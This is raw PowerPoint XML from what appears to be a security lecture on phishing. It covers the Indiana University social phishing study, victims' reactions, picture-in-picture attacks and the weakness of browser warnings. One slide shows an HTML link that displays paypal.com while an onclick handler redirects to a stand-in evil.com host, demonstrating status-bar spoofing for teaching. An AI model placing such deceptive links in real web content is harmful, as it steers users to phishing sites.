              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>-security-phishing-attack-in-the-wild/31951/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409347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97054F98-2A2D-CA46-ADFE-D93FF345A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Experiments at Indiana U. (2006)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1360899" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B02ED6D-DD04-714F-BBB2-FB326EA594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799" y="2103120"/>
            <a:ext cx="10463939" cy="4112286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Reconstructed the social network by crawling sites like Facebook and LinkedIn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Sent 921 Indiana University students a spoofed email that appeared to come from their friend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Email redirected to a spoofed site (domain name clearly distinct from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>indiana.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>) inviting the user to enter his/her secure university credentials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72% of students entered their real credentials into the spoofed site (most within first 12 hours)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Males more likely to do this if email is from a female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580E9E-368B-A843-A5CC-45A9BCB445F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10439400" y="6046129"/>
            <a:ext cx="122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Jagatic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t> et al.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416849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11657BF2-BFFB-4FF0-9FE2-4D7F7A7C9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397171-E233-4F26-9A8C-29C436537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A830B9C-C9EB-4D80-9552-AE9DE307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FDAEC93-69F4-FB43-AB8A-A09CAD8B9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800" dirty="0"/>
              <a:t>Five Stages of Grief</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1371143" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26A44CE7-E756-A042-81F2-5B01082F2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" y="1782150"/>
            <a:ext cx="6281928" cy="364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endParaRPr lang="en-US" sz="3200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/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Denial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/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Anger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/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Bargaining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/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Depression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/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Acceptance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20484" name="Picture 6" descr="kubler">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D8E04DD-1E1F-CB46-AEC9-C8C53EB06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6" r="-2" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7837371" y="237744"/>
            <a:ext cx="4124416" cy="638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66A910-F1FF-F845-A8A7-89EDEA0AA87D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8592483" y="6021431"/>
            <a:ext cx="30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Elisabeth Kübler-Ross </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3790171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05156260-4B25-3444-8E8B-0197280DD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Victims’ Reactions (1)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23BD58A-CCE7-9846-89AE-A6DE3A03DC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2103120"/>
            <a:ext cx="8759125" cy="4112286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Denial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>No posted comments included an admission that the writer had fallen victim to the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Many posts stated that the poster did not and would never fall for such an attack, and they were speaking on behalf of friends who had been phished</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Anger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Subjects called the experiment unethical, inappropriate, illegal, unprofessional, fraudulent, self-serving, useless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>They called for the researchers conducting the study to be fired, prosecuted, expelled, or reprimanded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240F0-5315-7C44-AC76-DD87F2FD4760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10439400" y="6046129"/>
            <a:ext cx="122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Jagatic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t> et al.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2558424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05156260-4B25-3444-8E8B-0197280DD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Victims’ Reactions (2)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23BD58A-CCE7-9846-89AE-A6DE3A03DC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2103120"/>
            <a:ext cx="9704522" cy="4112286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Misunderstanding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Many subjects were convinced that the experimenters hacked into their email accounts - they believed it was the only possible explanation for the spoofed messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Underestimation of privacy risks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Many subjects didn’t understand how the researchers obtained information about their friends, and assumed that the researchers accessed their address books</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Others, understanding that the information was mined from social network sites, objected that their privacy had been violated by the researchers who accessed the information that they had posted online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240F0-5315-7C44-AC76-DD87F2FD4760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10439400" y="6046129"/>
            <a:ext cx="122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Jagatic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t> et al.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EBA68B3-3C54-6A45-99BA-9E53BA61DF5C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3568564" y="4672275"/>
              <a:ext cx="6172920" cy="9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EBA68B3-3C54-6A45-99BA-9E53BA61DF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8564" y="4492275"/>
                <a:ext cx="635256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4F7C932-98A6-BF45-A9DC-CB76310EE127}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3097324" y="5457075"/>
              <a:ext cx="3238200" cy="49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4F7C932-98A6-BF45-A9DC-CB76310EE1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07684" y="5277435"/>
                <a:ext cx="3417840" cy="40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129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Content Placeholder 4" descr="bank-of-the-west-real.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A1E46AD-45CE-824B-8FF0-8A3C20089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2825" y="1880461"/>
            <a:ext cx="8001000" cy="4287838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AD78846-5131-184D-9FC9-DCA0DF477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90061"/>
            <a:ext cx="1524000" cy="374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E068F5-77FB-7045-B899-46A49F2DD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490061"/>
            <a:ext cx="1447800" cy="374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9C5B3E-BF4C-C149-84D7-1980B4798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614261"/>
            <a:ext cx="1676400" cy="374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58" name="Title 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{717BBDE0-ED63-834B-B9C4-D1AEBB99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Safe to Type Your Password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339363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Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A1E46AD-45CE-824B-8FF0-8A3C20089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87263" y="1880461"/>
            <a:ext cx="7992124" cy="4287838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AD78846-5131-184D-9FC9-DCA0DF477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90061"/>
            <a:ext cx="1524000" cy="374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58" name="Title 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{717BBDE0-ED63-834B-B9C4-D1AEBB99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Safe to Type Your Password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57927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58C11A40-EAE9-F444-8328-766F5A2B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Safe to Type Your Password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25603" name="Content Placeholder 4" descr="bank-of-the-west-tricky.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67B9B667-07B4-0342-9DE0-DEBF4A55D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2825" y="1899134"/>
            <a:ext cx="8001000" cy="428783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0277DC9-5E71-5F43-9550-8A73D920A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505559"/>
            <a:ext cx="1524000" cy="374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814D13-7CE5-7542-AC27-C483FC91B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715359"/>
            <a:ext cx="2057400" cy="10604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D7EAFA-D558-1141-81EB-9AB28E3BE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505559"/>
            <a:ext cx="381000" cy="374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9" name="Picture 8" descr="vest-up-close.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944E6409-370C-F548-9B96-67B383A9D8F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1" y="3419959"/>
            <a:ext cx="7271497" cy="2667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4155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BFFAF75B-8358-224B-8BFC-E159844D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Safe to Type Your Password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26627" name="Content Placeholder 4" descr="bank-of-the-west-pip.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F1E266-9075-D144-8121-408C24E02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45597" y="1619639"/>
            <a:ext cx="6210946" cy="4595767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2D01891-E443-5641-A30B-313D1054F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002340"/>
            <a:ext cx="1371600" cy="228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47CA63-CC7A-FB45-815E-0BA477709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2986842"/>
            <a:ext cx="1371600" cy="228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A5C9A2-D093-B742-B7B6-D09834B6C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678" y="5125930"/>
            <a:ext cx="1371600" cy="228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329EC3-68D3-BB47-8C5B-1225C880A84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84638" y="2362200"/>
            <a:ext cx="4144962" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700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06A03-FF28-EB4F-81EE-C602696ED70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084638" y="2362200"/>
            <a:ext cx="4144962" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700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400A515-2E7F-B44B-97B1-225C3B0D1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510" y="2034878"/>
            <a:ext cx="1371600" cy="228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82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274" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DE06BFF-4017-024F-8B89-2E79F2CD2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Picture-in-Picture Attacks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FCDBA4FC-6686-A04A-BA1E-A36F8FD4F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8" t="7292" r="7275" b="30208"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="1809750"/>
            <a:ext cx="76200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42D3C8-6A00-4A49-B651-2DA5111C8788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8973519" y="3099660"/>
            <a:ext cx="24177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Trained users are more likely to fall for this</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3232550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22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2DDF04-01DD-C644-A937-7E01AACD2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28" y="4960639"/>
            <a:ext cx="8908473" cy="902886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Dr. Dena Grayson on Twitter: &quot;🔥Less than 3 weeks after Corsi's ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7B89700-E0B6-A441-9ABC-73B670BB4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376" y="2157413"/>
            <a:ext cx="5382542" cy="226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best US election campaign documentaries | Guide">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967CA797-817E-CB41-B7EC-F514530D1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1"/>
            <a:ext cx="3429000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ohn Podesta - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A4F6DA-F018-404B-8A1C-18FECFB2F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30790"/>
            <a:ext cx="1454342" cy="193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Oval 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F2BC208-8EBD-E84B-AC3B-EC72019B0E2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855142" y="5239176"/>
            <a:ext cx="1590387" cy="39962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>
              <a:solidFill>
                <a:schemeClr val="hlin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1F7390-183C-F745-957A-1035B94D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in 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202174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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50DF8EC8-A36D-7941-AAD5-A8392287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Status Bar Is Trivially Spoofable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2867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2B05822-74AD-5945-BAB0-C3E96C56AE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ko-KR" dirty="0">
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>www.paypal.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>/”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800" dirty="0">
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>onclick=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>this.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t> = ‘http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>www.evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>/’;”&gt;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800" dirty="0">
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>  PayPal&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28676" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{120F15B2-864B-B849-A3D2-DE9EE4541ADC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133600"/>
            <a:ext cx="6858000" cy="1066800"/>
            <a:chOff x="528" y="1200"/>
            <a:chExt cx="4080" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28678" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A9F77AE-42C4-154F-83CA-BCA1F387D2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500" r="36719" b="4167"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="720" y="1200"/>
              <a:ext cx="38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</p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28679" name="AutoShape 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083B42C0-0BC2-0F4D-8427-07CF0CB1D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344"/>
              <a:ext cx="2688" cy="336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3395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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4DF4DF-29B4-FB40-B9B2-59C1CAD7A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918447"/>
            <a:ext cx="2552700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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BEC0B98-1998-F948-B8E4-FF4B326D06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Browser Warnings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638206-3710-6447-B12C-82708366893B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="5630442"/>
            <a:ext cx="2169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Passive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(not very effective)</a:t>
            </a:r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C7CEB3C-2A7A-5E49-B435-148F5AE65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290" y="1207546"/>
            <a:ext cx="3863478" cy="217772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4ECBDCC-A346-1E43-A942-A4AC6041D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393" y="3988577"/>
            <a:ext cx="5186209" cy="1641865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7DC9B11-0683-914B-BF6E-A345D4F8F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2181" y="2240679"/>
            <a:ext cx="3863478" cy="2376642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13526D-06E9-E740-B033-80BAD3EFB4F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6809361" y="5876537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Active</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3547069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/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2394273" y="2388417"/>
            <a:ext cx="6997700" cy="3330458"/>
            <a:chOff x="1057058" y="1168563"/>
            <a:chExt cx="6235948" cy="3559700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9219" name="Picture 8" descr="E:\TUXexamples\doYouTrustThisPrint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711" y="1168563"/>
              <a:ext cx="3448616" cy="1235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0" name="Picture 9" descr="C:\Users\roreeder\Documents\Projects\TUXexamples\IE8phishingAndMalwareWarningUnsafeOptionHidde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27" t="22890" r="9526" b="31331"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1057058" y="1627879"/>
              <a:ext cx="3782220" cy="1894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1" name="Picture 10" descr="E:\TUXexamples\runAprogramThatDidNotComeWithWindow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7441" y="2029781"/>
              <a:ext cx="3135565" cy="2009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Picture 11" descr="C:\Users\roreeder\Documents\Projects\TUXexamples\ieSecurityRiskDialog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7867" y="3292900"/>
              <a:ext cx="3465813" cy="1435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3" name="Picture 3" descr="C:\Users\roreeder\Documents\Projects\TUXexamples\ieYouAreAboutToOpe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9302" y="2926215"/>
              <a:ext cx="2476001" cy="1772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926C26-147A-0D4B-B88F-29917593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Security Warnings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2401623376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 descr="C:\Users\roreeder\Documents\Projects\TUXexamples\ieSecurityRiskDialo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344" y="2651454"/>
            <a:ext cx="4864967" cy="169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5438778" y="3239695"/>
            <a:ext cx="5874681" cy="1072835"/>
            <a:chOff x="2279137" y="3157867"/>
            <a:chExt cx="5874682" cy="1429897"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Oval 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2279137" y="3157867"/>
              <a:ext cx="1304925" cy="34752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271" name="TextBox 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5755762" y="3234067"/>
              <a:ext cx="2398057" cy="1353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latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Vague threat.  What’s the risk?  What could happen?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 7"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
